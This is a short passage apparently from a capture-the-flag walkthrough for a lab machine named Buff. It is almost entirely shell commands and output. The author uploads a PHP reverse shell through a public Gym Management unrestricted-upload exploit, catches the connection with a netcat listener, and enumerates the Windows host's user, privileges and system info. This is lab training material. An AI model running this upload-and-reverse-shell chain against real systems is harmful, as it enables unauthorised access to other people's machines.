3 :80

Using https://github.com/ssMMiles/gym-management-unrestricted-upload

$ cp /opt/php-reverse-shell/src/php_reverse_shell.php shell.php

$ python exploit.py -t 10.10.10.198:8080 -f shell.php
Uploading shell.php to 10.10.10.198:8080/up.php...
You can now access this file at http://10.10.10.198:8080/shell.php !

$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...

Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
whoami
buff\shaun

whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

systeminfo
Host Name:                 BUFF
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.17134 N/A Build 17134
System Type:               x64-based PC
Hotfix(s):                 N/A
